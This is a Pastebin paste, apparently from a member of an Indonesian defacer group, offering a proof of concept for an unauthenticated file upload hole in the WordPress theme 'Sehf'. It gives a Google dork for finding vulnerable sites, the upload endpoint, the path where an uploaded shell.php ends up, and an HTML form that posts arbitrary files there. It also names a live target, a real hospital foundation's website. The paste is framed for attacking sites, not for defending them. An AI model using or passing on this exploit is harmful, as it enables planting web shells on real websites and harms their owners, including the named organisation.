Need a unique gift idea?
A Pastebin account makes a great Christmas gift
SHARE
TWEET

[POC] Wordpress Theme Sehf File Upload Vulnerability | CSRF

Berandal666 May 3rd, 2017 149 Never
Upgrade to PRO!
ENDING IN00days00hours00mins00secs
 
  1. #################################################################################
  2. # Wordpress Theme Sehf File Upload Vulnerability | CSRF
  3. # Author : Berandal
  4. # Google Dork: inurl:/wp-content/themes/sehf/
  5. # Tested on: Win 7, Linux
  6. # Blog : http://www.maxteroit.com/
  7. #################################################################################
  8.  
  9. +-+-+-+-+-+-+-+-+
  10. |B|e|r|a|n|d|a|l|
  11. +-+-+-+-+-+-+-+-+
  12.  
  13. # [!] Exploit : http://127.0.0.1/wp-content/themes/sehf/server/php/
  14. # [!] File Location : http://127.0.0.1/wp-content/themes/sehf/server/php/files/shell.php
  15.  
  16. #################################################################################
  17. #CSRF:
  18. #################################################################################
  19. <html>
  20. <body>
  21. <form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/sehf/server/php/" method="post">
  22. Your File: <input name="files[]" type="file" /><br />
  23. <input type="submit" value="SIKAT!" />
  24. </form>
  25. </body>
  26. </html>
  27. #################################################################################
  28. # Live Target : http://sydneyeyehospitalfoundation.org.au/wp-content/themes/sehf/plugins/fellowships/server/php/
  29. #################################################################################
  30. # ABOUT:
  31. # Facebook: https://www.facebook.com/owlsquad.id
  32. # Twitter: https://www.twitter.com/id_berandal
  33. # Greetz : All Official Member OWL SQUAD - 6host Party Coder's - Alone Clown Security
  34. # All Indonesian Defacer.
  35. #################################################################################
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top